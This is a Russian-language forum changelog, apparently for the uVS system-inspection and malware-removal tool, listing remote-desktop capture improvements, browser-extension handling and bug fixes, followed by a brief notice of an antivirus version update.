         o DDA2 - очень быстрый метод сравнимый с захватом экрана с помощью mirror драйвера, но без использования драйвера,
                  работает начиная с Windows 8, низкий коэффициент сжатия, переменный fps в зависимости от экранной активности.
                  Способен захватывать видео с высоким fps (до 60) за счет упрощенного метода сжатия и обработки потока кадров.
                  (метод по умолчанию для Win8+, рекомендуется при значительной экранной активности).
                  (!) рекомендуется использовать при ширине канала не менее 100Mbit, при высоких разрешениях 1Gbit и выше
                  (!) из-за низкого коэффициента сжатия.
                  (!) При низкой экранной активности трафик до 10 раз больше чем у DDA1, при высокой - в 2 раза больше.
          
       o В окно удаленной рабочего стола добавлена кнопка "SYN" она замещает собой ручной выбора задержки захвата кадров.
         (отжатая кнопка соответствует нулевой задержке)
         Если кнопка нажата то задержка, а значит и максимальный fps ограничивается автоматически в соответствии
         с пропускной способностью канала, к сожалению это понижает максимальный fps и увеличивает инпут лаг,
         однако это полностью решает проблему, которой страдают даже лучшие программы удаленного управления
         при недостаточной ширине канала. Если канал слишком узок (10Mbit и менее) то при значительной
         экранной активности (оконное видео или анимация) происходит потеря управления удаленным рабочим столом
         из-за того что новые кадры отправляются в буфер значительно быстрее, чем клиентская машина успевает их получить и отобразить,
         в результате чего даже нажатия кнопок отображаются с задержкой в несколько секунд.
         Тоже самое будет наблюдаться в uVS в сходных условиях если кнопка SYN не нажата.
         Поэтому SYN не рекомендуется отключать при значительной активности в кадре и узком канале.
         Если канал 100Mbit и выше (локальная сеть), используется DDA2 то можно выключить SYN и это сильно поднимет fps и значительно уменьшит инпут лаг.
         Кнопка SYN по умолчанию нажата, состояние кнопки сохраняется при выходе из uVS.
         Выбранная цветовая битность теперь тоже сохраняется.

       o В окно удаленной рабочего стола добавлена кнопка "MR" она позволяет управлять указателем мыши из удаленной системы,
         Функция работает ЕСЛИ кнопка нажата И курсор находится в пределах окна удаленного рабочего стола И это окно активно.
         Функция предназначена для тех случаев когда человеку на том конце проще показать проблему чем описать ее словами.

       o Теперь клиентская часть uVS автоматически завершается если удаленная система перезагружается, выключается или завершается сеанс пользователя.
         (только если открыто окно удаленного рабочего стола)

       o Значительно увеличена скорость переключения мониторов, рабочих столов и смены разрешения монитора в DDA режиме.
         (!) Однако есть побочный эффект: если новый монитор будет подключен к удаленной системе пока открыто окно рабочего стола,
         (!) то для отображения картинки с этого монитора необходимо будет закрыть/открыть окно или повторно выбрать метод захвата экрана.

       o Добавлена поддержка браузера Microsoft Edge.

       o Обновлена функция чтения и удаления расширений браузеров: Chrome, Yandex, Edge.
         Добавлены сайты с включенными уведомлениями с указанием времени активации уведомлений.
         Из окна информации о расширении удалено поле Extension_homepageURL за бесполезностью.
         Мусор оставшийся от старых расширений помечается как "файл не найден" и будет удален при вызове функции удаления ссылок на
         отсутствующие файлы.

       o Контекстное меню в окне редактирования критериев теперь тоже использует выбранный размер шрифта.

       o Улучшена совместимость с системами с малым количеством оперативной памяти.

       o Исправлена функция захвата экрана в GDI режиме.

       o Исправлена ошибка в функции чтения защищенных файлов, в некоторых случаях функция не могла получить доступ к файлу.

       o Исправлена ошибка в функции смены рабочего стола

       o Исправлены ошибки инициализации COM.

       o Исправлена ошибка из-за которой из списка проверки выпало 2 ключа автозапуска.

       o Исправлена ошибка в функции отката изменений (Ctrl+Z) при работе с образом.

       o Исправлена ошибка повторной инициализации захвата экрана в случае если рабочий стол был переключен пользователем или системой
         до повторного открытия окна удаленного рабочего стола.

       o Исправлена ошибка при открытии окна информации о компьютере.
         Добавлена дата релиза биоса, исправлено отображение объема физической памяти, добавлена расшифровка типа памяти и условное обозначение
         ее производительности.

       o Добавлена возможность открывать ключ реестра в regedit-е двойным щелчком по строке в логе или
         через контекстное меню.
         (!) Недоступно при работе с образом автозапуска.
       
    • Ego Dekker
      Актуальные версии антивируса 18-го поколения

      От Ego Dekker · Опубликовано

      Домашние антивирусы для Windows были обновлены до версии 18.0.12.
×